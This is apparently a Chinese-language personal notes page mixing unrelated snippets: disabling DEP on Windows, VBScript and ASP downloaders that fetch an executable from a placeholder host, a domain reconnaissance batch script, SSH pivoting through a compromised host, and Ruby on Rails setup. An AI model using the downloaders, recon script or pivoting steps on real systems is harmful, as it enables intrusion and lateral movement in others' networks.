Windows XP SP3
在Windows XP SP3中，关闭DEP的方法是：
编辑C:\boot.ini，你大概会看到如下内容

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" 
/noexecute=optin /fastdetect

要关闭DEP，将/noexecute=optin 改为/excute，重启系统即可。

Windows 7
Windows7中不是通过boot.ini来保护了，需要在命令行中输入bcdedit，如果观察到输出的最后一项为
nx 1
表示DEP保护是开启的，并且级别为1
只需要运行

bcdedit /set nx alwaysoff

就可以了，然后重启系统。

Downloader 1

1
2
3
4
5
6
7
8
9
10
11
12

Set args = Wscript.Arguments
Url = "http://x.x.x.x/x.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2 '
end with

Downloader 2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
    Dim Ads, Retrieval, GetRemoteData
    On Error Resume Next
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "Get", s_RemoteFileUrl, False, "", ""
        .Send
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        .SaveToFile Server.MapPath(s_LocalFileName), 2
        .Cancel()
        .Close()
    End With
    Set Ads = Nothing
End Sub

eWebEditor_SaveRemoteFile "c:\x.exe", "http://x.x.x.x/x.exe"
%>

Get System Info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

@echo off
ipconfig /all
net start
tasklist /v
net user 
net localgroup administrator 
netstat -ano 
net use 
net view
net view /domain
net group /domain
net group "domain users" /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net group "exchange domain servers" /domain
net group "exchange servers" /domain
net group "domain computers" /domain
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with   atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

Get Task List

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

''''''''''''''''''''''''''''''''''''
' tasktool.vbs@b4dboy 
''''''''''''''''''''''''''''''''''''

On Error Resume Next
Dim obj, pross, pid, killName
pid = WScript.Arguments(1)
killName = WScript.Arguments(0)
 
Set obj = GetObject("Winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set pross = obj.Execquery("Select * From Win32_Process")
Wscript.echo "[PID]" & VbTab & "[ProName]"
 
For Each proccess In pross
    If (WScript.Arguments.Count = 2) And (CStr(pid) = CStr(proccess.ProcessID)) Then
        proccess.Terminate 0
    ElseIf Ucase(proccess.Name) = Ucase(killName) Then
        proccess.Terminate 0
    Else
        WScript.echo proccess.ProcessID & VbTab & proccess.Name
    End If
Next

建立热点：

@echo off
netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=热点名 key=密码
netsh wlan start hostednetwork

关闭热点

netsh wlan set hostednetwork mode=disallow

VC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    __asm{
        mov eax,a
        mov ebx,b
        mov ecx,1h
        add eax,ebx
        mov c,ecx
    }
    printf("%x\n", c);
}

GCC

1
2
3
4
5
6
7
8
9
10
11
12
13
14

#include <stdio.h>

main(){
    int a = 1;
    int b = 2;
    int c;
    asm(
        "add %2,%0"        //1
        :"=g"(c)           //2
        :"0"(a),"g"(b)     //3
        :"memory"          //4
    );
        printf("%x\n", c);
}

VmWare默认的镜像格式是.vmdk格式的，VirtualBox则默认是.vdi格式的。其实这在VirtualBox新建虚拟机的过程中是可选的。

导入.vmdk格式的镜像到VirtualBox只需要新建一个虚拟机，并且不创建虚拟硬盘。如下图：

无视警告，继续：

创建好之后，在设置里面把.vmdk格式的虚拟硬盘添加进去：

这样就可以了。

如果遇到windows虚拟机起不开的情况，尝试更改下下面这个选项,启用I/O APIC试试。

在很多时候拿到了内网的一台主机，我们需要用它做跳板来对内网进一步扩大战果。
也许方法很多，meterpreter，nc等等。但是最方便也最有可能穿透防火墙的方法，就是用ssh。
分为四种类型：
本地转发，远程转发，跳板转发，动态转发。
本地转发
假设攻击机A主机为本机，ip是y.y.y.y,用户是hacker，被攻击且用作跳板的主机是B，ip是
x.x.x.x，对应的内网ip是10.0.0.2，用户是root，ssh的端口是22。
假设B机器上的80端口开放了一个服务，但是只有B主机本机上才能访问，这时候可以使用本地转
发，在A机器上执行命令：

1

ssh -L 8080:localhost:80 [email protected] 

这样，在本机A中访问localhost:80,数据被转发到B主机的80端口，即实现了访问B机器的本地
服务。
很常见的一个实例就是攻击者拿下了某目标内部的网关服务器，但是出于安全考虑网管的web控
制台界面只有在网关服务器自身上才能访问，这时候就可以通过这种方式转发流量，方便的操作
网关服务器的web控制台了。
上面的情况，是基于A主机可以ssh到B的情况，但假如从A到B的ssh连接被拒绝，而恰好B主机的
防火墙没有禁止其使用ssh外连，这时候就可以通过远程转发来实现上述同样的效果。
在B机器上执行命令：

1

ssh -R 8080:localhost80 [email protected] 

这时候在A机器上访问自身的8080端口，数据也是被转发到了B主机的80端口上的。
可见，这种方式受到的局限比较多，因为如果能够在B主机上使用ssh外连了，还需要通过ssh来
转发流量的情况也是很少见的，但也不是没有。
以上两种转发，都是只对跳板服务器自身的服务，很多时候，渗透需要的是内网中一台稳定的跳板，
这时候就可以使用
跳板转发来实现多主机之间转发。
假设现在需要通过B主机作为跳板，来访问与B处于同一内网中的机器C的80端口，假设C的ip是
10.0.0.3,这时候可以在攻击机上执行如下命令：

1

ssh -g -L 8080:10.0.0.3:80 [email protected] 

此时在A主机上8080端口的流量就被转发到C主机的80端口上了。
最有用的就是最后要介绍的，
动态转发，这种转发可以将流量随心所欲的转发，此时实现的效果就相当于代理服务器，在A机器
上用下面的命令实现：

1

ssh -D 8080 [email protected] 

此时在A机器上配置SOCKS代理端口localhost:8080,就可以以B为代理服务器随心所欲的畅游。
最后补充使用ssh进行X转发的命令，其实很简单：

1

ssh -X [email protected] 

这样连接上以后，目标机器的X服务器所做的操作都会通过x协议发送到本地，很方便的实现了可
视化操作。
例如在终端输入firefox，就可以在本地弹出一个实际上运行在远程的firefox进程。

Windows中搭建Ruby On Rails环境

步骤如下

1. 安装ruby (我选择的版本是ruby 2.2.3p173)
2. 安装rails gem
   在这之前建议先把gem的源换成淘宝的源，速度快点。

   1 2 3 4 5 6 7 8

   gem sources --add https://ruby.taobao.org/ --remove https://rubygems.org/ gem sources -l *** CURRENT SOURCES *** https://ruby.taobao.org # 请确保只有 ruby.taobao.org gem install rails

之后：

1
2

gem install rails
gem install bundler

3. 安装devkit
   下载地址 http://rubyinstaller.org/downloads

如果是win10，选择 DevKit-mingw64-64-4.7.2-20130224-1432-sfx.exe 这个版本。

然后运行，并选择解压到c:\devkit

进入c:\devkit目录
运行

ruby dk.rb init

之后修改config.yml

添加下面三行

1
2
3

---
 - C:/Ruby22-x64
 - C:/Ruby22-x64

注意把路径换成当前ruby的安装路径，-前后各有一个空格不可忽略。
然后运行

ruby dk.rb install

最后进入需要建立工程的目录，使用如下命令新建rails项目

rails new testapp

如果在此过程中报错，则进入testapp中
使用

bundler install

来安装所需要的依赖包。

如果还报错，修改testapp目录中的Gemfile

将第一行的sources源内容改为

source 'https://ruby.taobao.org/'

然后再执行bundler install命令

Debian中搭建Ruby On Rails开发环境

假设你已经安装好ruby了

接下来安装rvm

$ curl -L https://get.rvm.io | bash -s stable

某些情况下，可能需要编译一下rvm的初始化脚本

我的位置是在/etc/profile.d/rvm.sh，所以运行这一句:

$source /etc/profile.d/rvm.sh

接着安装bundler

gem install bundler

然后安装rails

gem install rails

如果这地方出现错误，尝试使用rvm切换ruby的版本：

rvm install 2.0.0
rvm 2.0.0 --default

CentOS中搭建ruby on rails开发环境

1
2
3
4
5
6

curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/bin/rvm
rvm install 2.0.0
rvm 2.0.0 --default
gem install bundler
gem install rails